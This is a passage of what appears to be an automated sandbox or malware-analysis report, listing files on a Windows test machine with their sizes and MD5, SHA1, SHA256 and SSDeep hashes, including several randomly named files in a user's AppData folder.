SSDeep: 12:lhnMSc3HYk2aGBMT0KGXAAmJOyKN3Bj6yYyAuGrhb5z8DsukYOBtrx8O3NcC:lhgok2actfAo/Bjd+zBR8DeY81x39l
False
C:\Users\EEBsYm5\AppData\Roaming\D4hFvv-xbwD80n_k.mp3 69.36 KB MD5: a5a4129912e9564e3be3bcb1af32ec3f
SHA1: 0d7c9e20d22487943c0a0992aa7d9297e9e4913f
SHA256: 6c51b6af01ecb0c7cc2ec54d57f84db27f0e26a20b431df46b2a5cf81a88f9d1
SSDeep: 1536:opE89ZekWkl2yZnNYFXBtVK69akpqLIpXtukZST0rEMzag:opTQkkyZn2FXjr9LpqsdtuwSi
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Soft Blue.htm 0.75 KB MD5: 455ba2fa50e8a383a2a057a3e3e6155d
SHA1: 477a409464633254ba13e8dcb5cee1078f41c25c
SHA256: 4addb9ed87bbf24fbbca0624ed7c81875b7d57a46bf72948b898d0e2785fc366
SSDeep: 12:jPLlsKtOAaj7GybmR4r/vjOkN8QCNmVLdodLNMEtxyk5a9HChiWjc5SC:jLgDiG7vCkN8pNmVLuwcxyPB3Xx
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg 4.65 KB MD5: 7d5480e07788cd9010dabbff1669a6e2
SHA1: 068424719033bd5df5e53bbfb265157ea3fe7524
SHA256: 2d1684aab91586b76d91663f99370d604962868df99ffdd52ac62601c2f80687
SSDeep: 96:ZsKlrRaOCE/gD+lsp7aIG3x8lVxs3ZRU8DpfennXMyu0FdZ3bPn+sanbpd:GkruylhtxCVx4ZBpfen8KbZrPn+vd
False
C:\Users\Default\Favorites\Microsoft Websites\Microsoft Store.url 0.66 KB MD5: 206e667224c1717de0f052eaa3588a71
SHA1: 2e6e0d087d9566198c51765afd3da88cfd23c403
SHA256: 48f46f586f1edc0675a0c69f824cc6beef1e53691638fbc0391ca3bcc5d75d10
SSDeep: 12:LzC7wwswpSuHMr22AwnZT7EWbN/PLUeT1E3oRD6d8B9D8vWzvIGhOjlCC:K7FxpSuHU2KZT7EWJ7Ze37wIX
False
C:\Users\EEBsYm5\AppData\Roaming\iaG_GkHNHdnzSAk_0f.avi 49.27 KB MD5: 8e738dbdc24b8dda784c5714d3afa8a7
SHA1: 3ef14211ceef313e36e63cd0315f80062fe70cce
SHA256: 9df25a7ff0228df01029b66958668982f114c7b1b0ca4ed88d7aa47c6863de19
SSDeep: 1536:a6ekNk5bjEHrA9m/HqXu7EEi6bE48+halab0:8IkVELA9m/H97EEi4j0
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg 1.58 KB MD5: 17f06d07bf929d4bed7af1c6f2c2f05c
SHA1: 4d81ee399067f36a163ab365cf2aeea139a705da
SHA256: 82e80a283feb8493fa9709a586b9df293ba149fb8403908549b19f4faee7eb45
SSDeep: 48:ltKoDhdsGLCRRkoTPRwnGsMe0G+H5rQKmUsi8h9GrUaepP:7KKdnCRRkoTPL9eMHBJSErUa0P
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\08_Video_rated_at_4_or_5_stars.wpl 1.52 KB MD5: cf453a97102743d3378816bdd47c0e40
SHA1: 80c615dfca15f61814b6877f20e90caa0ba819c5
SHA256: a2e95e104cfe60923d26bca185c234c495a9680f842ef9026c85c2748b33caf4
SSDeep: 48:oihkrMA3O1ZhzykkhDTdqo2+kBrH7MpJWKP:3hklS/khDUr+0oJrP
False
C:\Users\Default\Contacts\Administrator.contact 67.31 KB MD5: b7ff1843a78c41bbbac5103f6e985e4d
SHA1: c1ab89f100e691ae952c04bc41d70ee31565e374
SHA256: 059759c37f45a5afb39056d9d2460d1fd045f40fed6625737d607d4ccad78a8a
SSDeep: 1536:MReYumf8vkzcUyt1BgXQgpX2ye37LwP1yC2noAoyfX:MkYu+8LUYLUQ2mfwIZoy/
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\SoftBlue.jpg 10.85 KB MD5: f5b1ec958e690f158ac7c92ded10b731
SHA1: f9e929a49efd7c06da458682e1821eb2880c222c
SHA256: aa6c72d2b55fa17e8a23806cec60a29ce99333396b604a6a42a71bfaf6e8fe8c
SSDeep: 192:CL90BYWjLQf0azFpTSOUZ87lFifdCMxlA+1wjJOHy/C+awKMcnEybW5GpMy:CLSKSLWzTAZ87TifdCMxlQNOHyHakcn9
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\HTML Help\hh.dat 8.92 KB MD5: a9a673b83eaebfad079abaea7c497dfc
SHA1: 4c020c986c8aee74eba6cb897f961ad257c157d5
SHA256: 3ea4b2d698b8b22609817b0a9ff0248177b08be2f02300cadbde4e23dffa36fe
SSDeep: 192:GiOCi9RAcymoWiwxEb7cgg1lZFwMe7yoXvQkF6tWSXu:gRUmo6ib4gAlDwMe7nVFqje
False
C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\Winre.wim 10.00 MB MD5: c2698ce163e28905ff84891238959589
SHA1: 9be2f65b63f7ec6be7f10e70c343b9e2f4b52539
SHA256: 0fe434114080e778e0712b3665a4ca1c73ed7e9d115ccb916eb49e215dba6829
SSDeep: 196608:96aX6gTQIGkqojQRljrffo1feRTC+JO2Lg9VgqBpiTGWv8tvgwSDP:R7cI1jeljrffowRxdLgjciWv8tvgV
False
C:\Users\EEBsYm5\AppData\Roaming\5TbJjRTqQcJAG8oUNN.m4a 97.23 KB MD5: 29ecdbbca561061dd6666fa8613a8363
SHA1: 774057da038f3b8229e21731f39efca909a3fdbc
SHA256: 9760d330419d04407ce1a0ca985323465388fdef2d4dace8d7dfb9d7ecef4ab1
SSDeep: 1536:/mMcikbMxvbnnRBuhxr3WVXSz3CuCNisVZQl6MA1+qoMWJ4kTf9t8X:/ZciQMxvbLMxaVX03PCHG4Mk+qcJh9KX
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\07_TV_recorded_in_the_last_week.wpl 1.54 KB MD5: 5a6f5be7d3982b678362c882456afc09
SHA1: 330fbd200c85b3dcdf9c35214dbfeb69997361e3
SHA256: 21d64b3857f919cb96ea94d03c8079735fdd6e2fd3bbdb18cacdf0a1a59e8c67
SSDeep: 48:E6XuCg1YegXN6n7TNtvL0k++O6v1T909Akw6vlQ9:E6+MLN6nr0k++3v1ZQTlQ9
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\09_Music_played_the_most.wpl 1.53 KB MD5: fd9eb73b7364a07d2f8ae5914dc19025
SHA1: 929adc02a68de88f516337ad6f50ce9f3fe97d28
SHA256: c5aa9bda172f301fb06696ad30ef88d2c563b218ab18146ac7586c131343d048
SSDeep: 24:urEcuhFL+Cc0Jwg1zP1oOLRsFfF8Mgm/9E22ZxMa7SyTGNu4gSBIBdOeUAZGQYic:urEcALVD1q8Ml12uyTXzSCdOePGQYMF6
False
C:\Users\Default\AppData\Local\Microsoft\Feeds\FeedsStore.feedsdb-ms 7.03 KB MD5: 832eb902041889733cc0ea72e0f5e8d3
SHA1: 0c12aea6cfcf4fd1c890a38db751c4eca6641fce
SHA256: 8022386178506ad9966851aa2b2df958faefbac2fc7ff9b6fd5d4fcca4227e95
SSDeep: 192:VKw/j3/3MKNfoU0zYxywbOjDTF9BPNGDMBIfuIeuC:9/j3/3oU0sxhbOj1HNoMBouIe3
False
C:\Users\EEBsYm5\AppData\Roaming\k34HcmsYrEK4_.bmp 15.71 KB MD5: 54003f1794e58f776d7947858accec3c
SHA1: ae5cae40728c78985bbb8877191568b40d37def9
SHA256: 2f368e817ac686c204873635f8497ae1aaf0c7c7370aac23067f46787bb8041e
SSDeep: 384:b700KL/A0iAh9tfodWfSukcmAzeGErVl8xiD05Sf:4tXh9tgcSfDzAI
False
C:\Users\EEBsYm5\AppData\Roaming\Cav7r34AQxz266BdGIX.m4a 2.09 KB MD5: 28647c40bde73c36643dda2040237e2a
SHA1: ddf8cb87d6bfe9c5e73d5ad24c2f72faef62314e
SHA256: 980073dc28c25b51b5298294c29fa80950a0dbbd480a8bebe71455070b87ca91
SSDeep: 48:VVNtNMvSQgq28uDWF33jGzRwGX/ZxrBU5E3Ds4rzLgWAF0W0ZD3Fq:VVzEhgqEDWFDUtXRxr2asHEfU
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\02_Music_added_in_the_last_month.wpl 1.78 KB MD5: 02b2a2a5381dd2193f9e94d3f06db25c
SHA1: 15828659893d102b9468418ae9c824f151475530
SHA256: 87248771f32c1691ba60f255e5b6853f93daed59d8fd4b09a584dece01a85601
SSDeep: 48:8w0G71mqFrZOY98c/5Pe5jSML+TZ6yU8CO4UZQQ2MKZod:SG5tZO9c/5G5Dh6gk
False
C:\Users\EEBsYm5\AppData\Roaming\-vZCBx3T8O8PG8Z7.rtf 25.21 KB MD5: b97c6795dad8db7892aed6f14215ff8b
SHA1: 904ddb24d34f439b7aedb82ad0d78269636d5ff1
SHA256: d11d6b1128294ce2cf01c12d207854eb080aaf2b9effb2e5a8235b3a93be3ca9
SSDeep: 768:CYqk7LA0UiKmU+YWclDiMejsHHWpekJFmC:zD7LA0PKm5Yz2MejsHMeIEC
False
C:\Users\EEBsYm5\AppData\Roaming\ABdV76mhVKc67XfMG.odp 66.22 KB MD5: 4864882cd403a18bb0737438a3da58b1
SHA1: 98c22a826221a2ab4e8fddeb635e865d3362005f
SHA256: 7321483960b6937143f106d083f887fdba0c09fcfd97dfb0ea16c2e19a02f3d6
SSDeep: 1536:9PsC7Aovxj8SiER0CwVWmVhDJKeE3V2gH1AilqxTmvFeFOLfUuVizN:ZV7sSDw4mVLOAm5UFtuC
False
C:\Users\EEBsYm5\AppData\Roaming\g-uvZ0afpQw.avi 7.96 KB MD5: 7ae121cd98cb40e4033162243ceca69c
SHA1: 5589463c11c1e0096578d9aea36eb3ede7526555
SHA256: 4f126b31c91afc01d536f4280b5b725c58d5bf5c971b20b45b19b776467f7cdd
SSDeep: 192:DeWwhg8jielQaiIwL90UQfh/V53ACXEogX:qWw/+aiZGUQhfX5gX
False
C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata 5.80 KB MD5: c6edb72e9f798253256bc5183f6f35ea
SHA1: 6cbdddb17be4df8f18cbc7055b9594fc322986ed
SHA256: 8f6fd56f7fda672de691175d395885593e852d7f40f5f017c2dc9fd17d12b351
SSDeep: 96:Sp6oVfDpryMAJ5XnXogElA4U4AphxbIBjQUAZ0+hydYaSrl34lLYgSnxJEkY:ScoJDdyd/XKlAn4AFbIEfUdY3rlIlLYw
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\3Q4BCXJF\id[1].xml 0.61 KB MD5: 6d7313243fe5a428086e2e714b99593e
SHA1: 3890ed18f93e7ca4e2881eb6ca7271609716799a
SHA256: 4bb5e9369c04f845e08a5d83574e5c71441d4d80f1bc00546af2b34ef163e222
SSDeep: 12:2Exthn1eQBa6JRTvFeNXLULMB+FsFsApiw5It6FIKvhfTaa0+2C:2Exthi6JRTvFYYMIAp5544XvhfTHLb
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\MS Project\14\1033\Global.MPT 382.03 KB MD5: 1d38665ea206e7370e18b16be17188d0
SHA1: bff901a929ec4dedb039c6c4fe3dc695734577f1
SHA256: 6b7bcc573729d5388f6fccef563fee67ff8031accce6e8ca9380fcba7f7efb49
SSDeep: 6144:CPDnnXPETcoRAX0raqZZyqG/0ZSuOmmDwhewMcPZV+qIYdpetwXA7AUSrdxuoPf7:sf2GkraqZscZSdmnewhn+q5dpetwXA7g
False
C:\Users\EEBsYm5\AppData\Roaming\CmR7tOD7XC.avi 37.43 KB MD5: ac4f762ff81bc8716eaedd2db75386cf
SHA1: 2269acd985e14b689cdf4894d52ccb4ce77d03f2
SHA256: f05e17959f8f307dfdf3cb1f1432a71829d7af09bf8a095e46b32eb9284b3589
SSDeep: 768:+fTFDZn1ROqmRM3OR1eXX03YX0YGRsxXj/eJDKzJxjO26PmenTpeJpZrrx7NxkK:+fTZZGqm63OR4XFwspWDKz6TpoZHfOK
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log 2.00 MB MD5: 01941b4ea3545bed637450fc70157732
SHA1: 0f858614c72e456d5fd2621ea88a3aa1e407a46a
SHA256: 4ed723f5cc505090301a154f2c9a9e372d1df2c9197b0a9ad4771cfc66cd5e16
SSDeep: 49152:N0QDZMLPrYBPYG9ygECdNN5BzD7S5XzvY1V/6rdFb+ncT7Whyo5:NXDaLDYBPYG9y8NfBLS5XLWhql+cT70
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs 2.00 MB MD5: 91d982e45fd1bddaa7380a32dd48b0e4
SHA1: 698d63fb446b580df3bc412bd27e3bc8ba1ec198
SHA256: fffa2de436f7e7c9573d0081a76734b764a19d7e40b99070b126196ca214b5f3
SSDeep: 24576:OTIC8F1cMn4jjV9B5M5f9Cg1XGgR4lLvivYKHH4luz:OE1N4jjVpwfkGR4lLviQKHH42
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\11_All_Pictures.wpl 1.10 KB MD5: 4faec776691fa7c568bee307b76674ba
SHA1: 3302e1216e7926ae7ba83671c54fc8dca1ef0770
SHA256: 9e870133f6176f1344bfc7c5a9a3aef3f50b9fbfa66c86590b5407b92f83ac88
SSDeep: 24:zQGnb9zJ66XZEjvDWimrRcRdjsfRwxDiuCDYpMdURmpuH8:p9zJ1wVGcLjSEyF
False
C:\Users\Default\AppData\Roaming\Microsoft\Protect\CREDHIST 0.55 KB MD5: 1a696ccc254483f721f440cbcd8d93b7
SHA1: 9382f35d6166e96e20868cf8c7f0db83cad64b26
SHA256: 6694748ca8190d255b42a0a39266ce4623affbc1c1061aff3e03808d1041968d
SSDeep: 12:s/jYxQmOWMu6GFmq4fe6XaCWxb+y+qyPP0+wX54LSdZYBolf94dS/kLvKtZIRhCx:Mj5WshnfeZCob+yHyPP0+wX54LmYelfN
False
C:\Users\Default\Favorites\Windows Live\Windows Live Gallery.url 0.66 KB MD5: 956c473697185117bf199612f0defb23
SHA1: 728a23eeda010cce31d7afa334d6b02af436b04d
SHA256: 0952fe3d1670dd4e40768cdf2a8a12b460a85fd6ce6d454344db9404db724aa0
SSDeep: 12:TTubjDXxVWmqxCkUxPCP6QMt5kXEGen0hxr+25waqLWFA+raI6dlgOC:WbpYmqEkUlDQMteEUh1+Wwa6f8FTj
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat 16.53 KB MD5: f282e46fd54553795d391cf898330d90
SHA1: 2e340d5d56cb6b30afcbc4023a41303ea393af70
SHA256: 3f2dd58706c1799db68afbc98e8a6d4de96475995fe681c35d60791da22c51bd
SSDeep: 384:AzG6bARYK1yE6H0lq2/8+Lp6GA1WMrC0mk9tnREG:6534yE6HuVQKMmrmdR1
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm 0.76 KB MD5: 37051351dd6d04989be0f964a6d1991e
SHA1: 8413c6047150aea580c48e548c84a50550357130
SHA256: 97ae678ce34a10559c0b637a9c268c66a172a6e42909842226b194562d8b2bd7
SSDeep: 12:XUaRRKcnkVBbTtnOoZn+G4Z6tg1FwoMVdlQigrAaZLt/TUcTjsjuiVC:kaRIusrOc+5qyfMVgiN0Ucf4O
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.jpg 7.86 KB MD5: 511812a460e4c536efd0b5c993fc6419
SHA1: 84cbc4fbae9528d87994e86155a594d17f6e658b
SHA256: e055b542e29986e7005ea09a17ac241ea398aeb36ec705721cc671e45babb002
SSDeep: 192:+zYvoBDHHXnUe1smWVTIlVdeP40GvqIbtjXvcrZ:+Y4DImWVTIX440+qszErZ
False
C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\Preferred 0.55 KB MD5: 32939e09cdeac9643050ad318a522e56
SHA1: 7aa7597c1a17e76e09079e719e530362084b0790
SHA256: dfae25f385281e900fad752e4e34579a4c0db80ec7187279a1ac00d7e8eef05e
SSDeep: 12:UtwRUy6KEHhXt9LODgUEKglk1LMgfCQji2cAE9TLX8NUC:GCUyBEHhTvUEjlk1kQDcBTO
False
C:\Users\Default\Favorites\MSN Websites\MSN Money.url 0.66 KB MD5: 23d1ed4bffb441e2c99d65a94b87cfb3
SHA1: 8a1a4f419a2ca70f529e7c0ada6e1a4bdeb2b496
SHA256: 80cfa5e76e18dc92663804341eb11e315c09104d573df5119d6de54c9cd09fbb
SSDeep: 12:5C+VHUbxWCjdbAkgCx+87qo3+dlxh2dnuFRCrp8QuEQBeezy3U6i1uQpaSSJfLpy:1j4lAD4+W7+d3h0uFs5IBeMy3K1uQNWc
False
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms 512.53 KB MD5: 9eb242071b7b4703f68cd8dfdfa1ab77
SHA1: eacddb71bda9e44bd0a024c1b7900f13796cc930
SHA256: 19609237a8a93c47e0787e5fd3ac8897cc7292164403f0d3de3c7cff4d5126c8
SSDeep: 12288:CnKgw+1O3bEca3Lf1ZlU4h1+jGmBRPBhNaRdAHDVIYsrqQ1DSLCyuXX:gKx+8Gpfz+tPBXaR+2wQYLLuH
False
C:\Users\Default\Favorites\MSN Websites\MSN Autos.url 0.66 KB MD5: 17d35b10425bc0320e9345b3afc79280
SHA1: 1036e8ac75e92f18e33396565b96c80ca3efcb69
SHA256: 5aa7d1c892e221045786ddfe852c62b70fa6a291111d23813a7e3496547ec9b8
SSDeep: 12:QAlJEo1ubFxMlLdGDBToGmT4Vex76l4nSHNVTF0R5OZRZfH7fjsTnKs7w9w66E8O:/lOMWILdGD1oG8b5Y4Ifp0R5OvZfzo2L
False
C:\Users\Default\Favorites\MSN Websites\MSNBC News.url 0.66 KB MD5: 11ee7caf3bd1a1e3d116baa4a16160ca
SHA1: 61d84ff4ffc844cf47a8713e454bc4f6f9bb9a33
SHA256: 41e06d71700253797a8d9b003df5379ad8398c9c0361accedcb5a014fd772ff9
SSDeep: 12:j1ga981AgUNpydV1DWN9ecZlgBQzGKXgH0F3ySakReX8L6POGEIuC+C:Wa98ygbV8NZlgBQiPH0F3ySNziuEz
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{91E541D8-6C9E-48C0-AB69-0A7168AA62DE}.oeaccount 2.00 KB MD5: 3291e82d938cf3039fdedca46c32716e
SHA1: 207a6c1199be9085469a99b7c8937305c361ec1e
SHA256: 3657fa7e648068cb0fa3c48d79d4367447a639c1e7a213d2386eafffd2d23a2f
SSDeep: 48:cmvweUO2A+3RNueO9YbRKPk4eF6t4puSDia2fdb8+:DvhD2n3hIYbmk4cQg258+
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{553187ED-CFB2-4763-8DAE-48D3609A76AC}.oeaccount 2.22 KB MD5: 2ec450d27a3d3fa61d4db36b38a45883
SHA1: 9f3044b993f556db5f1b5024b6dd0d9b7ff12c4d
SHA256: 4de0d0dd96986ef80b3008002196ccd3ddd236f50d8c55c6131d8f44f86dc201
SSDeep: 48:2c0+hdbKgCX/QsXzKQe0oovO1iGR+LBerSKtdJsztshk:5hdBCX//jKQqIqfaQr53J4b
False
C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML 10.48 KB MD5: 31b570bda9928cfa77b9400c3ac2de0e
SHA1: 72e523eed3a81bb9f3693a4288da3920aeafc589
SHA256: 219dd9f408c06c70a6a104dd798f6dae6cdd56998c777eedf7ebb223a2fbe389
SSDeep: 192:/C1gFyOc4zneB7wNsRGEkLcfmAGnpuBq9OAeTSm07awj68pDcJ:/C14NzzeeNpMiWJyewj68pQJ
False
C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf 64.53 KB MD5: cf70009edfe6b7bf9ab21615aa245a60
SHA1: a16c3de68aa58ceb3d8bff4524bb4ac4c7d14ac9
SHA256: 814a73151f58f5cc090c5c1c29a12327f5594574320ab0bb6f7ef71dfd6c9bed
SSDeep: 1536:yrT0nD5xld8XUtnqb4Mpu0V/V15zGrInJ5lQBLb17S:pDld8kRXMAQ15zGraFSL5O
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\10_All_Music.wpl 1.57 KB MD5: fdb27fa5d8e110b20ea0db7f356e68c4
SHA1: 680432600d4177adffc494a76a13a2746c069802
SHA256: bddb078e38e4dcefba9daa3700d6387120d60513699638219503b3c54803a13c
SSDeep: 24:MULj8w0+sz36wOkqoxtFzsqhjBHfJMegtQ8kQZ+ct6pv8BtKIBy95XvF9TTrQ/kf:zLcAElzsiXMegtYQ0cIpgBy3/3QIoq+K
False
C:\Users\Default\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms 28.53 KB MD5: c642dccbaabc1ac5d2070a10b1486449
SHA1: 8590c442b6ed2906f59140c75fc63429a2721ebb
SHA256: fb30fb269d6ec5bbd38d8b150569c7025ca9d410b475861571e77fb6dc64cf2b
SSDeep: 768:FUCViHlB+poF5alVgtuK4n7EBrdXnz3CxU305Fw1:FUCViHj+6F5alVg34n4BhXO071
False
C:\Users\EEBsYm5\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol 0.81 KB MD5: d7ff79a732a1d62b5319457801096e04
SHA1: 3d4eed2e06da601457b2d724c2021c1e99f0e2c4
SHA256: b66a3564ade63ff97fdf00ac9180a4c8a4330b43a92f558f12b7bfb848a9a06f
SSDeep: 12:tOQgrPxCeRFOTE26DvsC2AfE8D46Me5eujdHQ1G1AKGeQcjtwp5yShNEAsf123wv:0pvEAc8d5eedHQ15PAWhSAMAA3eHCX
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm 0.76 KB MD5: f50f7419f49ffaa8aa2291f31e572bbb
SHA1: ff809bb4958916967c6b958d7b9b7b98dac922c1
SHA256: 51188af708beb749205928e42358a0d9801b662708d04ca0170d72cdc91931e0
SSDeep: 12:sdHxFDwadzT6czwmkKNrYUbk5mICQejlQoxion8UU0izLb+gcdlZTv4XmVyMvqSC:sdRFN5RUm5F7lQosoupsZ8WgMA
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edb.log 2.00 MB MD5: d93a44e501e5c3cc2b6937c1d3d0168f
SHA1: 267aabbff3225cb6ae478491eebbf5462cf7cb17
SHA256: b569508d9f685853740ac5aca5be27139763edcc70eb7b36236572f3635bf5b9
SSDeep: 49152:shxJziMmsyUbifkB1MLqQZ1eoP8PjbamOTkHul2C1/h0myXv:exxiMaUeMDMLqQjeokPjFmkHHCBz4v
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg 6.76 KB MD5: 3e9d681cc8eeb716b55d08fe17756d11
SHA1: b1a2df0cdcb4976a3b5be33686ffdd48df21c4eb
SHA256: f8ec0d873d4e374a7e8fada6224bc7f52140a5c270257f155b5237295c488f68
SSDeep: 192:jh5QKTEtos75LYXdIVfddOZ+3YiBYiAA2K4/A5E:F5QKTEtoKsNwTeGuJ/SE
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\05_Pictures_taken_in_the_last_month.wpl 1.31 KB MD5: 42d63b1f0bafbe255569b5ec52570c15
SHA1: ed28d34c1ff4574c722b5e0d5e67fba96c52ad61
SHA256: cf4b0ae5065f1ffce3fb80ec4003a4ed4dc90ab3b94c1ff69d256456126a5bb2
SSDeep: 24:JBBHK9kjveXV5Qm7gGPFgsMoQXCh/wnLF0Edhj+wY5rKwglVUbl:fBq9kr07Qm7Z/3Q5LBqrHglVYl
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs 2.00 MB MD5: c0104241ff99983b2634b150f29effb7
SHA1: e6f64bfaa399f1c49d3fd68fab1b45b7f09b5cbd
SHA256: 340ee7b49035d2a8269e9de3c9965407e67c7f7a726b85e0a987cf454fa6929f
SSDeep: 24576:kSnPI2XPx+FNm2H2T/E770JlJe3WYB7QUDEqQfmhFl/RS:hnP5kFovaSG3smhDRS
False
C:\Users\Default\Favorites\Links\Web Slice Gallery.url 0.75 KB MD5: e6fa0249ab3444a15f4a8dd11986b109
SHA1: c6466b1076f94801f57429e97bba6440ed6790f9
SHA256: e876fa7e8e53bb516218fc70b7861cbe9d9a016458311f031d21b0bfb7b3ca94
SSDeep: 12:I/Pf9Eg/qCRIi3fLJ5uZQCo0vmt0fwweAXN/citP6f/mM36qXCivVg3ItoI6BFyd:IP9v9Ii3dy2Dt04Tm63mo6Kd9g4toxFy
False
C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl 37.35 KB MD5: 8292e61691a7abfb88b484d37b445484
SHA1: e494eb83aecb03b58f1867d1165383369a8398af
SHA256: dca89b31d2656bdba4ea7cce89d61b88f13d11b2eb3118d9896ee6b7a198c85a
SSDeep: 768:rpmlCq5ybvJkyiNgNeVbMwNUcZjmquZx8O4bsBgtWSJ+UEFtz:9I/5KJcg2bZvKqE4ztWSUU+
False
C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Work.url 0.66 KB MD5: 25da10502e6c2ccebb32467fc8493819
SHA1: a616b9eedea23d2fd02270141c5235cedd0f8ac4
SHA256: 2f64ee5a208e66ff874cc9d06770a947e565b73ab6af69538db713042836ca13
SSDeep: 12:sKeLQ17gXbWJiCZiO4e+QdMUVhO66ej1mJPydjFgKCzS26LTM/Ofyw1EC:sKeLdbUiCSWOa6ej1mRydjFgKZnMcywH
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3785418085-2572485238-895829336-1000\83aa4cc77f591dfc2374580bbd95f6ba_cdd36b99-6027-4bbf-bf10-e7f8b416e3fb 0.57 KB MD5: 3381646a049e590114f7679de8f12dde
SHA1: 5984e6a5fe312bdb906f128ba6afde6817c9b6e0
SHA256: 01ffb95b44214dcceab33a6b2b887d6abd454ca899b527be135c8dcc254d05ac
SSDeep: 12:TCmoN8O/rc/2pLJrAvF+ZNUw3iBK+PkRtdMpsxeCB3M6FE3pIuHmhyC:sN3hJrkiCCT3zypU6GEhmJ
False
C:\Users\Default\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD 1.01 KB MD5: d186b0ff13789fd47dbfcf8e8684581a
SHA1: 4ca91c3dca2649206857ed1d21efe13458ce71ca
SHA256: 9866d21596d33a6b957cb3be3dd74d681ac3dfd4d23185266309d32760508365
SSDeep: 24:0lLHcEHyXNeHvrf/PuBU2I5Cw7OZjKzA77c8VN41GyfVwT7s5qQMA6XSWNtS8qhf:0l7tyIkGnOZOzU7c8D4IwVQ7s4pvS7h
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\L3DK0KAH\id[1].xml 0.61 KB MD5: 7cb7490f85e987a464dc83bec18e7f2e
SHA1: 56de93d0326cea37deef2a8fad32fc719323dbe1
SHA256: d6fcf9c8e14009381ae034b9c69996d9f6a7dfae4301f53f5d8d865ff694c2bb
SSDeep: 12:mMqe6GI0v0D/RP0AORKhChOlhP0N7rmHcVCGzZMHMZdxQTlQODSNDsMcE30FMC:B3tJv0V8lRKUhe8tMJGzZ+MuTO99y
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\03_Music_rated_at_4_or_5_stars.wpl 1.76 KB MD5: 7132af5b0bbd7e790601856580991fed
SHA1: 53efa04ec35d36bc074698e0e8746417a3eb18a9
SHA256: a5fe2cffbbe64ef0a203f63ee164730ec741cdadcb47ced6af5e1f9867de0e8a
SSDeep: 48:yvrftDztCzUX1ZbJ3ws0IJnEfov86JL3+N:aFzgwlZbqUZdRJqN
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg 23.84 KB MD5: e16410bf598e90d136c8fd6b2009f3b9
SHA1: 134dfc47220bb0a3ffeb396440532fdf5fb187bb
SHA256: 77387dae9ab0ccf9fcfb30f301ec51283e78db7a1739fb393ebc9947a22655f2
SSDeep: 384:rbymG6JmxVDleTx2TDoFPChbAg2lkr4NEwkWdVacA6eSBJH9Fkne+JUEP9k:fExVRwqUz7ker26em5EP9k
False
C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\7c86938c-9ade-44b2-a1b9-d6e5269c7ffa 0.98 KB MD5: c24dc758d109c74a498a029acb1bbbee
SHA1: ff52f5d140ceeb16a4b11ecf132f714f13451b39
SHA256: 49a48260d08e9dab1e8b2f81350f66bf24b0281a7e795b2379a756a92022ea44
SSDeep: 24:MTTON5BNU3RgDDGdPomXXxwrh3As5KO4gW+A:MTTOnUhgDcXXS5MMA
False
C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Home~.feed-ms 28.53 KB MD5: 983b63593e2497ce3a7c1c6acc6530b6
SHA1: 6778043df7ae369b1d5d88612a9b8c1b9e42398a
SHA256: f014b95ba7d2251ff9fec2943fc78a768055bf06ea420cbb6b2e45d575b5ab32
SSDeep: 384:LyRpz7TtA+46zSazcyDFsItTlUb3sQ2okpBFTIqxJiNfsuBA2cWEYSxTOFn6Ctej:LeTe+46zSyRDFs13sQC/6qftcn6seBqS
False
